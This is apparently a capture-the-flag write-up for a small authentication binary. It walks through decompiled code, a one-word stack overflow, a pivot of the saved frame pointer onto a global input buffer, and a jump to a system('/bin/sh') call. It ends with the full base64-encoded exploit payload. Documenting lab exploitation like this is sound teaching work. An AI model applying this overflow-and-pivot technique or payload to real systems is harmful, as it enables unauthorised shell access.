(Too lazy to review lessons before exam... Load with IDA and found:
_BOOL4 __cdecl auth(int a1)
{
char v2; // [sp+14h] [bp-14h]@1
char *s2; // [sp+1Ch] [bp-Ch]@1
int v4; // [sp+20h] [bp-8h]@1
memcpy(&v4, &input, a1);
s2 = (char *)calc_md5(&v2, 12);
printf("hash : %s\n", (char)s2);
return strcmp("f87cd601aa7fedca99018a8be88eda34", s2) == 0;
}We can notice that int v4 is at bp-8h.
str_len = Base64Decode(&s_input, &buf);
if ( str_len > 12 )
{
puts("Wrong Length");
}
else
{
memcpy(&input, buf, str_len);
if ( auth(str_len) == 1 )
correct();
}But in main, it's length can be up to 12.
To control EIP, we can overflow the buffer and replace EBP to change the stack, when it leaves, it will mov esp,ebp;pop ebp;; and then it return, it will jump to [esp].
Jump here we can get a shell:
.text:08049284 mov dword ptr [esp], offset aBinSh ; "/bin/sh"
.text:0804928B call systemAnd since $input is in .bss section and the program has no PIE, we can simply change the stack to $input.
.bss:0811EB40 inputThe final exp:
>>> print "ABCD\x84\x92\x04\x08\x40\xeb\x11\x08".encode('base64')
QUJDRISSBAhA6xEI